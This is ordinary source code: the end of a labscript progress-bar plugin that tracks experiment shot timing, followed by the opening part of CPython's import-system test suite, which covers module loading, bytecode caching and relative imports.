self.bar.setPalette(self.style.standardPalette())
@inmain_decorator(True)
def update_bar_value(self, marker=False, wait=False):
"""Update the progress bar with the current time elapsed. If marker or wait is
true, then use the exact time at which the next marker or wait is defined,
rather than the current time as returned by time.time()"""
thinspace = u'\u2009'
self.bar.setEnabled(True)
assert not (marker and wait)
if marker:
labscript_time = self.markers['time'][self.next_marker_index]
elif wait:
labscript_time = self.waits['time'][self.next_wait_index]
else:
labscript_time = time.time() - self.shot_start_time - self.time_spent_waiting
value = int(round(labscript_time / self.stop_time * BAR_MAX))
self.bar.setValue(value)
text = u'%.2f%ss / %.2f%ss (%%p%s%%)'
text = text % (labscript_time, thinspace, self.stop_time, thinspace, thinspace)
if self.bar_text_prefix is not None:
text = self.bar_text_prefix + text
self.bar.setFormat(text)
def _start(self, h5_filepath):
"""Called from the mainloop when starting a shot"""
self.h5_filepath = h5_filepath
# Get the stop time, any waits and any markers from the shot:
with h5py.File(h5_filepath, 'r') as f:
props = properties.get(f, self.master_pseudoclock, 'device_properties')
self.stop_time = props['stop_time']
try:
self.markers = f['time_markers'][:]
self.markers.sort(order=(bytes if PY2 else str)('time'))
except KeyError:
self.markers = None
try:
self.waits = f['waits'][:]
self.waits.sort(order=(bytes if PY2 else str)('time'))
except KeyError:
self.waits = None
self.shot_start_time = time.time()
self.time_spent_waiting = 0
self.next_marker_index = 0
self.next_wait_index = 0
def _stop(self):
"""Called from the mainloop when ending a shot"""
self.h5_filepath = None
self.shot_start_time = None
self.stop_time = None
self.markers = None
self.waits = None
self.time_spent_waiting = None
self.next_wait_index = None
self.next_marker_index = None
self.bar_text_prefix = None
def mainloop(self):
running = False
self.clear_bar()
while True:
try:
if running:
# How long until the next thing of interest occurs, and
# what is it? It can be either a wait, a marker, or a
# regular update.
next_thing, timeout = self.get_next_thing()
try:
command, _ = self.command_queue.get(timeout=timeout)
except Empty:
if next_thing == 'update':
self.update_bar_value()
elif next_thing == 'marker':
self.update_bar_style(marker=True)
self.update_bar_value(marker=True)
self.next_marker_index += 1
elif next_thing == 'wait':
wait_start_time = time.time()
self.update_bar_style(wait=True)
self.update_bar_value(wait=True)
self.next_wait_index += 1
# wait for the wait to complete, but abandon
# processing if the command queue is non-empty,
# i.e. if a stop command is sent.
while self.command_queue.empty():
try:
# Wait for only 0.1 sec at a time, so that
# we can check if the queue is empty in between:
self.wait_completed.wait(self.h5_filepath, timeout=0.1)
except TimeoutError:
# Only wait for wait completed events if the wait
# monitor device supports them. Otherwise, skip
# after this first timeout, and it will just look
# like the wait had 0.1 sec duration.
if self.wait_completed_events_supported:
# The wait is still in progress:
continue
# The wait completed (or completion events are not
# supported):
self.time_spent_waiting += time.time() - wait_start_time
# Set the bar style back to whatever the
# previous marker was, if any:
self.update_bar_style(marker=True, previous=True)
self.update_bar_value()
break
continue
else:
command, h5_filepath = self.command_queue.get()
if command == 'close':
break
elif command == 'start':
assert not running
running = True
self._start(h5_filepath)
self.update_bar_value()
if (
self.waits is not None
and len(self.waits) > 0
and not self.wait_completed_events_supported
):
inmain(self.ui.wait_warning.show)
elif command == 'stop':
assert running
self.clear_bar()
running = False
self._stop()
else:
raise ValueError(command)
except Exception:
logger.exception("Exception in mainloop, ignoring.")
# Stop processing of the current shot, if any.
self.clear_bar()
inmain(self.bar.setFormat, "Error in progress bar plugin")
running = False
self._stop()
def close(self):
self.command_queue.put(('close', None))
self.mainloop_thread.join()
# The rest of these are boilerplate:
def get_menu_class(self):
return None
def get_notification_classes(self):
return []
def get_setting_classes(self):
return []
def set_menu_instance(self, menu):
self.menu = menu
def set_notification_instances(self, notifications):
self.notifications = notifications
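# Note (not part of the original plugin): the mainloop above is driven entirely
# by ('start', h5_filepath), ('stop', None) and ('close', None) tuples pushed
# onto self.command_queue by on_science_starting, on_science_over and close()
# respectively; between commands its timing comes from get_next_thing().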
|
__init__.py
|
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, JYTHON,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if JYTHON:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
